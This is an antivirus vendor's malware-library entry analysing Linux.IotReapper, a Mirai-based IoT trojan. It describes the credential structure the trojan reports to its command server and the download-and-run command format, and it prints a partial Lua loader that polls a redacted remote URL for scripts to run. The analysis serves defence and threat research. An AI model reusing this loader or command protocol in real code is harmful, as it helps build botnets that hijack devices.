My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets


Virus library

An analysis of the technologies used by cybercriminals allows us to draw conclusions about the virus industry’s possible vectors of development and more effectively confront future threats. You, too, can learn what actions various malicious programs take in infected systems and how to withstand them.

Linux.IotReapper in virus library:


  • cd078ef54430c9ef9aa24dfbb7c89456f13e86f6
  • 8f40a00effdc150d15f7a49ce7c72efc5fc364d9

A Trojan that infects IoT Linux devices. It is a modified version of Linux.Mirai.

Instead of brute-forcing logins and passwords to hack devices, Linux.IotReapper launches exploits (at the present moment it uses 10 exploits) and checks the result of their execution. If a device is vulnerable, it uses the GET request to send to its command and control (C&C) server the following structure:

  char host[40];
  char port[10];
  char user[30];
  char password[40];
  char gw_name[30];
  char device_id[30];
} DeviceInfo

where device_id — a unique identifier of the infected device.

Periodically, it sends to the C&C servers the following requests:


where the values of the act parameter are exit code system call, or finish, if there is no launched files.

The Trojan obtains commands from the C&C server in the JSON format. It processes the following commands:

state0 or 1
coderun — download and run, down — only download
ipsource for downloading
namename of the file saved to the /tmp/ folder
md5its md5
porthttp port
pathurl to a file

The Trojan downloads from the remote server a module of the Lua interpreter for the architectures ARM and MIPS. The module contains the following code in the Lua language:

local sock = require("socket")
local http = require("socket.http")
local ltn12 = require("ltn12")
local lua_url = "***http://***.com:8080/run.lua"
local tj_url = ""
local request_body = "macaddress=" .. DEVICE_MAC .. "&device=TP-Link775" .. "&type=armv5le&version=" .. VERSION
local if_modified_since = nil;
function http.get(u)
    local t = {}
    local headers = {
    if if_modified_since ~= "" then
        headers = {
            ["If-Modified-Since"] = if_modified_since
    local r, c, h = http.request{
        headers = headers,
        url = u,
        sink = ltn12.sink.table(t)
    if c == 200 then
        if_modified_since = h["date"]
    return r, c, h, table.concat(t)   
local r,code,header,body=http.get(lua_url)
while true do
    if code == 200 then
        print("Download Succeed")
    elseif code == 304 then
        --print("Download Not Modified")
        print("Download Failed:" .. code)
    sock.sleep(5 * 60)

This module can currently download and launch a script that looks the following way:

print("Just Test")

The functions of the Trojan allow to receive links, download a file from them and launch it. However, attempts to obtain active links were unsuccessful during the research of the sample.

Vulnerabilities for Android

According to statistics, every fifth program for Android contains a vulnerability (or, in other words, a "loophole") that lets cybercriminals successfully introduce Trojans onto mobile devices and manipulate them into doing whatever actions they need them to.

Dr.Web Security Auditor for Android diagnoses and analyses a mobile device’s security and offers solutions to address security problems and vulnerabilities.

The Russian developer of Dr.Web anti-viruses
Doctor Web has been developing anti-virus software since 1992
Dr.Web is trusted by users around the world in 200+ countries
The company has delivered an anti-virus as a service since 2007
24/7 tech support

Dr.Web © Doctor Web
2003 — 2021

Doctor Web is the Russian developer of Dr.Web anti-virus software. Dr.Web anti-virus software has been developed since 1992.

2-12А, 3rd street Yamskogo polya, Moscow, Russia, 125124